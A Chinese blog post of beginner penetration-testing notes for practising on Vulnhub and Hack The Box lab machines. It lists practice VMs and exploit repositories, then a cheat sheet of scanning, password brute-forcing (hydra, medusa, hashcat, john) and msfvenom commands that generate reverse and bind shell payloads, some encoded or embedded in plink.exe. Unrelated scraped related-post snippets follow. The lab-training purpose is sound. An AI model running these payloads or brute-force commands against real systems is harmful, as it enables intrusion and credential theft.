**

基础篇

**
目标:通关vulnhub平台上的靶机
作者:大余
时间:2020-01-17

请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、练习平台

想渗透入门的小伙伴,建议已下平台最少练熟30~50台以上,熟悉渗透思路。
Hack The Box:https://www.hackthebox.eu/
Vulnhub:https://www.vulnhub.com/
Root Me:https://www.root-me.org/

Hack The Box 靶机推荐:

Vulnhub 靶机推荐:

Kioptrix: Level 1 (#1): https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Kioptrix: Level 1.1 (#2): https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
Kioptrix: Level 1.2 (#3): https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
Kioptrix: Level 1.3 (#4): https://www.vulnhub.com/entry/kioptrix-level-13-4,25
Kioptrix: 2014: https://www.vulnhub.com/entry/kioptrix-2014-5,62/
FristiLeaks 1.3: https://www.vulnhub.com/entry/fristileaks-13,133/
Stapler 1: https://www.vulnhub.com/entry/stapler-1,150/
VulnOS 2: https://www.vulnhub.com/entry/vulnos-2,147/
SickOs 1.2: https://www.vulnhub.com/entry/sickos-12,144/
Brainpan 1: https://www.vulnhub.com/entry/brainpan-1,51/
HackLAB: Vulnix: https://www.vulnhub.com/entry/hacklab-vulnix,48/
/dev/random: scream: https://www.vulnhub.com/entry/devrandom-scream,47/
pWnOS 2.0: https://www.vulnhub.com/entry/pwnos-20-pre-release,34/
SkyTower 1: https://www.vulnhub.com/entry/skytower-1,96/
Mr-Robot 1: https://www.vulnhub.com/entry/mr-robot-1,151/
PwnLab: https://www.vulnhub.com/entry/pwnlab-init,158/
Metasploitable 3: https://github.com/rapid7/metasploitable3
Lin.Security: https://www.vulnhub.com/entry/linsecurity-1,244/
Temple of Doom: https://www.vulnhub.com/entry/temple-of-doom-1,243/
Pinkys Palace v1: https://www.vulnhub.com/entry/pinkys-palace-v1,225/
Pinkys Palace v2: https://www.vulnhub.com/entry/pinkys-palace-v2,229/
Zico2: https://www.vulnhub.com/entry/zico2-1,210/
Wintermute: https://www.vulnhub.com/entry/wintermute-1,239/
Lord of the root 1.0.1: https://www.vulnhub.com/entry/lord-of-the-root-101,129/
Tr0ll 1: https://www.vulnhub.com/entry/tr0ll-1,100/
Tr0ll 2: https://www.vulnhub.com/entry/tr0ll-2,107/
Web Developer 1: https://www.vulnhub.com/entry/web-developer-1,288/
SolidState: https://www.vulnhub.com/entry/solidstate-1,261/
Hackme 1: https://www.vulnhub.com/entry/hackme-1,330/
Escalate_Linux: 1: https://www.vulnhub.com/entry/escalate_linux-1,323/
DC: 6: https://www.vulnhub.com/entry/dc-6,315/
IMF: https://www.vulnhub.com/entry/imf-1,162/
Tommy Boy: https://www.vulnhub.com/entry/tommy-boy-1,157/
Billy Madison: https://www.vulnhub.com/entry/billy-madison-11,161/
Tr0ll1: https://www.vulnhub.com/entry/tr0ll-1,100/
Tr0ll2: https://www.vulnhub.com/entry/tr0ll-2,107/
Wallaby’s Nightmare: https://www.vulnhub.com/entry/wallabys-nightmare-v102,176/
Moria: https://www.vulnhub.com/entry/moria-1,187/
BSides Vancouver 2018: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/
DEFCON Toronto Galahad: https://www.vulnhub.com/entry/defcon-toronto-galahad,194/
Spydersec: https://www.vulnhub.com/entry/spydersec-challenge,128/
Pinkys Palace v3: https://www.vulnhub.com/entry/pinkys-palace-v3,237/
Pinkys Palace v4: https://www.vulnhub.com/entry/pinkys-palace-v4,265/
Vulnerable Docker 1: https://www.vulnhub.com/entry/vulnerable-docker-1,208/
Node 1: https://www.vulnhub.com/entry/node-1,252/
Troll 3: https://www.vulnhub.com/entry/tr0ll-3,340/
Readme 1: https://www.vulnhub.com/entry/readme-1,336/
OZ: https://www.vulnhub.com/entry/oz-1,317/

二、基础知识

**

Linux提权

**
Linux提权指南:

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Linux提权辅助脚本:

https://www.securitysift.com/download/linuxprivchecker.py
https://github.com/HappyTreeFriend/linux-exploit-suggester

Linux Exploits(EXP):

https://github.com/HappyTreeFriend/kernel-exploits

Windows 提权

Windows 提权指南:

http://www.fuzzysecurity.com/tutorials/16.html

Windows 提权辅助脚本:

https://github.com/pentestmonkey/windows-privesc-check

Windows Exploits :

https://github.com/abatchy17/WindowsExploits

基础指令

linux 结果答案截图:

hostname && whoami && cat proof.txt && /sbin/ifconfig

windows 结果答案截图:

hostname && whoami.exe && type proof.txt && ipconfig /all

Kali 3389 to Windows:

rdesktop -u 账号 -p 密码 ip

nmap 完整扫描:

nmap –A ip –p 1-65535

nmap –sT –T4 ip -p 1-65535

gobuster扫描目录:

gobuster –w /usr/share/wordlists/dirb/common.txt –u ip

python 交互式操作:

python -c ‘import pty;pty.spawn(“/bin/bash”)’

id_rsa爆破:

./rsa_crack.sh id_rsa /usr/share/wordlists/rockyou.txt

Ssh –I id_rsa 账号@IP

John 爆破:

john ssh_login --wordlist=/usr/share/wordlists/rockyou.txt

7zip 爆破:

./7z-crack.sh backup.7z /usr/share/wordlists/rockyou.txt

Gcc 编译:

Gcc –o 文件 文件.c 或者 Gcc –o 文件.c 文件

Http Server:

Python –m SimpHTTPServer 80

Python3 -m http.server 80

rpcclient 空连接:

rpcclient -U “” IP

smb 连线:

smbclient //MOUNT/share

John 爆破相关:
hashcat -m 500 -a 0 hash.txt rockyou.txt --username

Hashcat MD5 Apache webdav file
hashcat -m 1600 -a 0 hash.txt rockyou.txt

Hashcat SHA1
hashcat -m 100 -a 0 hash.txt rockyou.txt --force

Hashcat WordPress
hashcat -m 400 -a 0 --remove hash.txt rockyou.txt

SSH 爆破:
hydra -l user -P pass.txt -t x.x.x.x ssh -s 22

FTP 爆破:
medusa -h x.x.x.x -u user -P passwords.txt -M ftp

MSF 生成 Payload:

PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=port -f raw -o shell.php

Java WAR reverse shell
msfvenom -p java/shell_reverse_tcp LHOST=IP LPORT=port -f war -o shell.war

Linux bind shell
msfvenom -p linux/x86/shell_bind_tcp LPORT=port -f c -b “\x00\x0a\x0d\x20” -e x86/shikata_ga_nai

Linux FreeBSD reverse shell
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=IP LPORT=port -f elf -o shell.elf

Linux C reverse shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=IP LPORT=port -e x86/shikata_ga_nai -f c

Windows non staged reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=port -e x86/shikata_ga_nai -f exe -o non_staged.exe

Windows Staged (Meterpreter) reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=port -e x86/shikata_ga_nai -f exe -o meterpreter.exe

Windows Python reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=port EXITFUNC=thread -f python -o shell.py

Windows ASP reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=port -f asp -e x86/shikata_ga_nai -o shell.asp

Windows ASPX reverse shell
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=IP LPORT=port -e x86/shikata_ga_nai -o shell.aspx

Windows JavaScript reverse shell with nops
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=port -f js_le -e generic/none -n 18

Windows Powershell reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=port -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1

Windows reverse shell excluding bad characters
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=IP LPORT=port EXITFUNC=thread -f c -b “\x00\x04” -e x86/shikata_ga_nai

Windows x64 bit reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=port -f exe -o shell.exe

Windows reverse shell embedded into plink
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=port -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

Kali基础大纲:
https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf

需要kali官方文档的找我…需要kali经典学习视频的找我…一起交流学习,加油!

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

No.20-基础-渗透学习相关推荐

  1. 渗透学习-SQL注入篇-基础知识的学习(持续更新中)

    提示:仅供进行学习使用,请勿做出非法的行为.如若由任何违法行为,将依据法律法规进行严惩!!! 文章目录 前言 一.SQL注入产生的原因 二.手工注入大致过程 1.判断注入点: 2.猜解列名 3.猜解能 ...

  2. 一个完整的渗透学习路线是怎样的?如何成为安全渗透工程师?

    目录 前言 1/我是如何学习黑客和渗透? 2/学习常见渗透工具的使用 3/操作系统(必须) 4/网络基础 5/编程: 学什么语言? 1年后: 渗透测试介绍 Kali的不同安装方式 kali工具介绍和基 ...

  3. Maya2022基础入门学习教程

    Maya2022基础入门学习教程 Maya 2022 Essential Training Maya2022基础入门学习教程 Maya 2022 Essential Training MP4 |视频: ...

  4. 麻省、北大、清华等顶尖高校与企业 20 位强化学习专家齐聚,RLChina 2021 强化学习暑期课免费报名啦!

    2016 年,AlphaGo 宛然横空出世,凭借精湛的棋艺接连战胜韩国围棋九段棋手李世石.中国围棋九段棋手柯洁之后,更是以 60 局无败绩的成绩轰动整个科技圈,人工智能的新纪元也因此开启.站在技术角度 ...

  5. FreeMarker中文帮助手册API文档,基础入门学习文档

    FreeMarker中文帮助手册API文档,基础入门学习文档 分类: 编程技术 发布: bywei 浏览: 7 日期: 2011年5月28日 分享到: QQ空间 新浪微博 腾讯微博 人人网 什么是Fr ...

  6. python语言自学-零基础小白学习Python编程语言的正确姿势(纯干货)

    原标题:零基础小白学习Python编程语言的正确姿势(纯干货) 敢问有哪种编程语言集简洁.优雅.简单.全能于一身?Python绝对算的上是一个.举个例子,比如完成同一个任务,C语言需要写1000行代码 ...

  7. 计算机电路基础学什么,"计算机电路基础"学习辅导.doc

    "计算机电路基础"学习辅导 "计算机电路基础(1)" 学习辅导 第六章 时序逻辑电路 (一)各种类型的触发器及其特点 触发器是指能够记忆一位二值信号的基本逻辑单元,也是构成各种数字 ...

  8. 【AI初识境】近20年深度学习在图像领域的重要进展节点

    文章首发于微信公众号<有三AI> [AI初识境]近20年深度学习在图像领域的重要进展节点 这是专栏<AI初识境>的第3篇文章.所谓初识,就是对相关技术有基本了解,掌握了基本的使 ...

  9. 【C++学习之路】第二章——C++基础语法学习(1)之黑客攻击系统

    2 C++基础语法学习(1)之黑客攻击系统 遵循原则:从实战中学习知识 法律声明:本系统仅能攻击自己搭建的网站,作为学习使用,不会触犯法律 time:2020.01.20 author:姜海天 IDE ...

  10. python基础入门学习笔记 (2)

    python基础入门学习笔记 2021年2月8日 1 编译器和解释器的区别 编译器/解释器:高级语言与机器之间的翻译官 2 值传递: print "a = ",a print &q ...

最新文章

  1. 1虚拟地址,虚拟内存映射,系统调用本质,进程运行状态
  2. TP5的请求响应参数
  3. eclipse中将一个项目作为library导入另一个项目中
  4. 个推基于Docker和Kubernetes的微服务实践
  5. PPG血氧饱和度计算
  6. Lua学习笔记3. 函数可变参数和运算符、转义字符串、数组
  7. 为什么不可以使用哈曼顿距离_声光色影俱佳,美也要与众不同,哈曼卡顿无线水晶4评测...
  8. 三种常见的ps删除通道的操作
  9. Redis笔记-实战篇(黑马视频教程)
  10. 使用Box2dWeb模拟飞行箭矢
  11. Docker安装以及docker run hello-world 不能下载镜像报错
  12. PPT转HTML手机软件,《PPT转换成Html》PPT转Htm、Html软件和方法大全
  13. 您知道Linux下C语言编程的一些注意事项吗_教育中国
  14. 罗杨美慧 20190919-1 每周例行报告
  15. 122.买卖股票的最佳时机 II
  16. 多米诺骨牌——变形版0,1背包问题
  17. 京东发布“厂直优品”计划 目标为超10万家制造企业搭建零售系统
  18. RHCE7 认证考试练习
  19. 安装 OpenVPN 客户端
  20. HID Relay, 有线键盘转蓝牙项目学习:记一次失败的尝试

热门文章

  1. 2019秋季PAT甲级考试总结:努力+策略+运气
  2. 如何提高soc算法精度
  3. Nginx 优化参考 —— 筑梦之路
  4. Problem : 货币兑换
  5. ImportError: cannot import name ‘OrderedDict‘ from ‘typing‘的解决办法
  6. 妖哲的日常3 QA前线——讨伐!全自动页游
  7. php最后一片净土,世界上最后一片净土究竟在哪里
  8. 传输加载优化(资源压缩、资源缓存、HTTP2)
  9. MATLAB代码:考虑阶梯式碳交易机制与电制氢的综合能源系统热电优化
  10. d强制访问位置服务器的数据库w,基于WEB的分布式数据库系统的研究与设计-软件工程专业论文.docx...